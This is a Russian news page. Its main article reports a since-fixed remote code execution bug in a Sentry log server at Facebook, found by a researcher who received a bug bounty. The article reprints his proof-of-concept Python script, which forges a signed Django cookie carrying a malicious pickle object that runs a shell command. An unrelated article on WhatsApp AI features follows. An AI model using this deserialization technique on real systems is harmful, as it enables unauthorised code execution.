Баг на сервере Facebook позволял удаленно запустить вредоносный код

Олег Иванов 28 Августа 2018 - 10:08

...

Баг на сервере Facebook позволял удаленно запустить вредоносный код

Разработчики Facebook исправили серьезный баг, который мог привести к удаленному выполнению кода. Сама уязвимость была обнаружена на одном из серверов интернет-гиганта, о чем сообщил исследователь безопасности Дэниел Ле Галл, также известный под псевдонимом «Blaklis».

Ле Галл, работающий в SCRT Information Security, в пятницу заявил, что ему выплатили $5000 за сообщение о проблеме безопасности.

Суть уязвимости в том, что злоумышленник может выполнить произвольные команды, используя вредоносные файлы cookie.

Несмотря на то, что подобные бреши обычно довольно опасны, эксперт подчеркнул, что с помощью этого бага нельзя было получить пользовательские данные. Разработчики устранили уязвимость в этом месяце, еще до того, как была опубликована информация о ее наличии.

«Blaklis» утверждает, что недостаток был найден на одном из серверов Facebook, где было запущено программное обеспечение для сбора логов Sentry.

«Само приложение было крайне нестабильным, особенно в отношении функции сброса пароля пользователя», — объясняет специалист.

В итоге Ле Галлу удалось найти в логах детали обработки cookie, а также подробности использования приложением протокола Pickle, который может быть уязвим для различного рода манипуляций. Используя все вышеозначенные данные, эксперт мог обработать файлы cookie, которые могли запускать команды на машине.

Исследователь опубликовал PoC-код, который является небольшим файлом cookie:

#!/usr/bin/python
import django.core.signing, django.contrib.sessions.serializers
from django.http import HttpResponse
import cPickle
import os
SECRET_KEY='[RETRIEVEDKEY]'
#Initial cookie I had on sentry when trying to reset a password
cookie='gAJ9cQFYCgAAAHRlc3Rjb29raWVxAlgGAAAAd29ya2VkcQNzLg:1fjsBy:FdZ8oz3sQBnx2TPyncNt0LoyiAw'
newContent =  django.core.signing.loads(cookie,key=SECRET_KEY,serializer=django.contrib.sessions.serializers.PickleSerializer,salt='django.contrib.sessions.backends.signed_cookies')
class PickleRce(object):
    def __reduce__(self):
        return (os.system,("sleep 30",))
newContent['testcookie'] = PickleRce()
print django.core.signing.dumps(newContent,key=SECRET_KEY,serializer=django.contrib.sessions.serializers.PickleSerializer,salt='django.contrib.sessions.backends.signed_cookies',compress=True)

Следующая главная новость »

Российские альтернативы Microsoft CA: чем заменить и не проиграть?
Регистрируйтесь на эфир!

Екатерина Быстрова 27 Марта 2026 - 10:17

Домашние пользователи

WhatsApp добавит ИИ-подсказки для ответов и редактирование фото в чатах

WhatsApp (принадлежит Meta, признанной экстремистской и запрещенной в России) выкатывает сразу целую пачку новых функций — от ИИ-подсказок для ответов до более удобной очистки памяти и редактирования фотографий прямо в чате. Но самое заметное обновление связано с Writing Help — инструментом, который теперь сможет не только помогать редактировать текст, но и предлагать готовые ответы на основе переписки.

Эта функция появилась у WhatsApp ещё прошлым летом: с её помощью можно было переформулировать сообщение, проверить его или поменять тон. Теперь Meta (признана экстремистской и запрещена в России) решила пойти дальше и сделать так, чтобы искусственный интеллект помогал подбирать ответ как надо.

Идея здесь понятная: удержать пользователя внутри самого WhatsApp, чтобы он не бегал за помощью в сторонние сервисы вроде ChatGPT. Правда, реакция на такую функцию наверняка будет смешанной. Одно дело — попросить ИИ помочь с письмом или деловым текстом, и совсем другое — использовать его для переписки с друзьями или семейным чатом.

В компании при этом уверяют, что конфиденциальность сообщений сохраняется, даже если пользователь включает Writing Help.

Кроме ИИ-ответов, WhatsApp добавляет и более практичные вещи. Например, теперь можно будет освобождать место в памяти точечно, удаляя крупные файлы прямо внутри конкретного чата, не снося всю переписку целиком. То есть история сообщений может остаться, а тяжёлые медиафайлы — уйти.

Ещё одно заметное обновление — работа с изображениями. Теперь Meta AI сможет помогать редактировать фото прямо в чате: убирать лишние объекты, менять фон или применять другой стиль.

Также WhatsApp расширяет возможности переноса данных. Пользователи смогут переносить историю чатов с iPhone на Android, а также между устройствами внутри одной платформы. Плюс на iOS наконец появится возможность держать два аккаунта WhatsApp одновременно — на Android такая функция уже есть давно.

Все эти функции уже начали постепенно разворачивать, и вскоре они должны стать доступны всем пользователям.

Российские альтернативы Microsoft CA: чем заменить и не проиграть?
Регистрируйтесь на эфир!